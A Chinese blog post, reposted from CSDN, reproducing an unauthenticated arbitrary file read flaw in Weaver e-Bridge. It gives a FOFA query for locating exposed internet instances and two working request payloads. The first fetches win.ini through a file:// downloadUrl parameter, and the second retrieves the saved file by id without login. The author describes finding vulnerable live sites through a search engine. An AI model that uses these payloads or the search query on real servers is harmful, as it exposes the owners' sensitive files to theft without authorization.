0
0

泛微e-Bridge未授权文件读取漏洞复现

简介

泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。

fofa

title="泛微云桥e-Bridge"

漏洞复现

因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。

payload1

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

直接在url地址后添加

之后复制返回的值进行访问

payload2

/file/fileNoLogin/id值

标签: 安全 web安全
本文转载自: https://blog.csdn.net/l1593572468/article/details/123289403
版权归原作者 Ling-cheng 所有, 如有侵权,请联系我们删除。
登录后发布评论

“泛微e-Bridge未授权文件读取漏洞复现”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

基于微信小程序的科学健身助手的设计与实现

自动驾驶车载SoC设计功能安全

量化交易系统开发-实时行情自动化交易-3.4.3.4.期货衍生数据

XCVU13P板卡设计原理图:509-基于XCVU13P的4路QSFP28光纤PCIeX16收发卡

近期两篇NeRF/3DGS-based SLAM方案赏析:TS-SLAM and MBA-SLAM

uni-app Vue3语法实现微信小程序样式穿透uview-plus框架

21.3D surface

文章导航